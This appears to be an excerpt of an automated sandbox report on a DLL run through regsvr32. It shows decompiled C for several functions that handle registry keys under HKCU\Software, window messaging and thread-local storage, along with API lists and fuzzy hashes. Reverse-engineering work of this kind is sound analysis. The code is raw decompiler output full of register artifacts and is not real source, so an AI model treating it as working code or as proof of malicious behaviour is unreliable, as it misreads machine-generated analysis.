Uniqueness Score: -1.00%

Function 1000BD98, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10057a08; // 0x3643b451
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E10017BC1(E10027F63, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000BB54(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000BB65();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
						_push(0x1002a248);
						_push( &_v16);
						_push( &_v36);
						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E1000BC25(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10009CB7(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E1000BC89(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E1000BC89(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10057298;
						E10017C83( &_v280, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t79, 0, _t100);
						_t94 = E10013965(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000CF71(_t94);
						}
						return E10017C60(_t77);
					}
				}
			}

0x1000bd98
0x1000bd98
0x1000bd98
0x1000bd9f
0x1000bda3
0x1000bdaa
0x1000bdb0
0x1000bdb7
0x1000bdbe
0x1000bdc0
0x1000bdc3
0x1000bdc6
0x1000bdcd
0x1000bdd0
0x1000bdd2
0x1000bdd2
0x1000bdd5
0x1000bdd6
0x1000bdd8
0x1000bddd
0x1000bddf
0x1000bde1
0x1000bde8
0x1000bdea
0x1000bdea
0x1000bded
0x1000bded
0x1000bdd2
0x1000bdf2
0x1000bdf5
0x1000bed2
0x1000bed8
0x1000bee0
0x1000bee1
0x1000bee2
0x1000beeb
0x1000bef0
0x1000bef7
0x1000bdfb
0x1000bdfd
0x1000be03
0x1000be05
0x1000be0c
0x1000be14
0x1000be1f
0x1000be22
0x1000be27
0x1000be2f
0x1000be33
0x1000be34
0x1000be39
0x1000be3c
0x1000be40
0x1000be44
0x1000be45
0x1000be53
0x1000be57
0x1000be5f
0x1000be65
0x1000be66
0x1000be73
0x1000be79
0x1000be7b
0x1000be90
0x1000be95
0x1000be9a
0x1000be9b
0x1000be9c
0x1000be9c
0x1000bea4
0x1000bea4
0x1000beb6
0x1000bec2
0x1000beca
0x1000becd
0x00000000
0x1000be07
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x1000be05

APIs

__EH_prolog3.LIBCMT ref: 1000BDB7
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6

Strings

Software\, xrefs: 1000BE0C

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6F2, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E1000B519(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E1000B911(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E100128D7(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E1000A5E4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E100128D7(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

0x1000f6f2
0x1000f6fb
0x1000f703
0x1000f705
0x1000f709
0x1000f70d
0x1000f71b
0x1000f71b
0x1000f720
0x1000f726
0x1000f72a
0x1000f72e
0x1000f733
0x1000f739
0x1000f7b1
0x1000f7b1
0x1000f7b1
0x1000f7b5
0x00000000
0x00000000
0x1000f74d
0x1000f74f
0x1000f7b7
0x1000f7b7
0x1000f7b7
0x1000f7be
0x00000000
0x00000000
0x1000f7c2
0x1000f7c8
0x1000f7d0
0x1000f7dd
0x1000f7e5
0x1000f7e7
0x1000f7e7
0x1000f7d0
0x1000f7eb
0x1000f7ed
0x1000f7f3
0x1000f7f5
0x1000f830
0x1000f830
0x1000f830
0x00000000
0x1000f7f7
0x1000f7fb
0x1000f802
0x1000f803
0x1000f805
0x1000f80d
0x1000f80d
0x1000f821
0x00000000
0x1000f823
0x00000000
0x1000f823
0x1000f821
0x1000f7f5
0x1000f825
0x1000f826
0x00000000
0x1000f82b
0x1000f751
0x1000f753
0x1000f757
0x1000f759
0x1000f761
0x1000f763
0x1000f763
0x1000f763
0x1000f765
0x1000f76a
0x1000f76c
0x1000f770
0x1000f772
0x1000f776
0x1000f785
0x1000f785
0x1000f776
0x1000f770
0x1000f78b
0x1000f790
0x1000f7ad
0x1000f7ad
0x00000000
0x1000f792
0x1000f79f
0x1000f7a5
0x1000f7a9
0x1000f7ab
0x00000000
0x00000000
0x00000000
0x1000f7ab
0x1000f790
0x00000000

APIs

GetParent.USER32(?), ref: 1000F720
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F747
UpdateWindow.USER32(?), ref: 1000F761
SendMessageA.USER32 ref: 1000F785
SendMessageA.USER32 ref: 1000F79F
UpdateWindow.USER32(?), ref: 1000F7E5
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F819

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE8A, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E1000A7CE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E10010DEC(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10057298;
						E10017C83( &_v28, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t37, _t46, _t51);
						_t43 = E10013965(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000CF71(_t43);
						}
						return E10017C60(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

0x1000ae8a
0x1000ae8a
0x1000ae8a
0x1000ae8f
0x1000aeaa
0x1000aeac
0x1000aeae
0x1000aeb9
0x1000aebf
0x1000aec1
0x1000aec3
0x1000aec4
0x100142c8
0x100142ca
0x100142cd
0x100142cf
0x100142f1
0x00000000
0x100142d1
0x100142d1
0x100142d6
0x100142d8
0x100142e9
0x100142e9
0x100142f0
0x100142f0
0x1000aec6
0x10014229
0x10014229
0x1001422a
0x1001422b
0x1001422c
0x1001422d
0x1001422e
0x10014232
0x10014238
0x1001423e
0x10014257
0x10014257
0x10014259
0x1001425b
0x00000000
0x00000000
0x1001424b
0x1001424d
0x1001424f
0x100142c1
0x100142c6
0x10014251
0x10014252
0x00000000
0x10014252
0x00000000
0x1001424f
0x1001425d
0x10014275
0x10014275
0x10014277
0x10014279
0x00000000
0x00000000
0x10014269
0x1001426b
0x1001426d
0x00000000
0x1001426f
0x10014270
0x00000000
0x10014270
0x00000000
0x1001426d
0x1001427b
0x1001427f
0x10014284
0x10014286
0x10014290
0x100142a7
0x100142a7
0x100142a9
0x100142ab
0x100142ac
0x00000000
0x00000000
0x1001429b
0x1001429d
0x1001429f
0x100142a2
0x00000000
0x100142a2
0x00000000
0x1001429f
0x100142bf
0x00000000
0x10014288
0x00000000
0x10014288
0x10014286
0x1000aeb0
0x1000a0db
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x1000ae91
0x1000ae91
0x1000ae96
0x00000000
0x1000ae9d
0x1000aea3
0x1000aea3
0x00000000

APIs

GetCapture.USER32 ref: 10014232
SendMessageA.USER32 ref: 1001424B
GetFocus.USER32 ref: 1001425D
SendMessageA.USER32 ref: 10014269
GetLastActivePopup.USER32(?), ref: 10014290
SendMessageA.USER32 ref: 1001429B
SendMessageA.USER32 ref: 100142BF

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661

Uniqueness

Uniqueness Score: -1.00%

Function 1000FC8A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FC8A(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1000B510();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E100174D0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000FBD6(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x1000fc93
0x1000fc9a
0x1000fca0
0x1000fca5
0x1000fcca
0x1000fcca
0x1000fcd0
0x1000fcd2
0x1000fcd2
0x1000fcd0
0x1000fcd5
0x1000fcda
0x1000fcde
0x1000fce1
0x1000fce1
0x1000fce4
0x1000fcec
0x1000fcf1
0x1000fcf1
0x1000fcf4
0x1000fcf8
0x1000fcfb
0x1000fd02
0x1000fd07
0x1000fd09
0x1000fd0d
0x1000fd17
0x1000fd1c
0x1000fd22
0x1000fd25
0x1000fd36
0x1000fd3d
0x1000fd40
0x1000fd40
0x1000fd0d
0x1000fd07
0x1000fd56
0x1000fd58
0x1000fd67
0x1000fd73
0x1000fd77
0x1000fd7f
0x1000fd7f
0x1000fd77
0x1000fd87
0x1000fd9a

APIs

_memset.LIBCMT ref: 1000FD17
SendMessageA.USER32 ref: 1000FD40
GetWindowLongA.USER32 ref: 1000FD52
GetWindowLongA.USER32 ref: 1000FD63
SetWindowLongA.USER32 ref: 1000FD7F

Strings

(, xrefs: 1000FD36

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013E40, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013E40(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10013e5b
0x10013e62
0x10013e65
0x10013e68
0x10013e6b
0x10013e76
0x10013ead
0x10013ead
0x10013eb8
0x10013ebd
0x10013ebd
0x10013ec2
0x10013ec7
0x10013ec7
0x10013ed0

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
RegCloseKey.ADVAPI32(?), ref: 10013EBD
RegCloseKey.ADVAPI32(?), ref: 10013EC7

Strings

software, xrefs: 10013E56

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10013CEE, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10013CEE(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E10017C83(0, 0);
				_t22 = E100134F9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E10017C60(_t28);
			}

0x10013cee
0x10013cee
0x10013cee
0x10013cf5
0x10013cff
0x10013d0b
0x10013d11
0x10013d16
0x10013d1c
0x10013d1e
0x10013d23
0x10013d29
0x10013d29
0x10013d31
0x10013d42
0x10013d4e
0x10013d53
0x10013d59
0x10013d5c
0x10013d61
0x10013d6b
0x10013d6b
0x10013d6e
0x10013d74
0x10013d7f

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
__CxxThrowException@8.LIBCMT ref: 10013CFF

Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23

Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB

_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
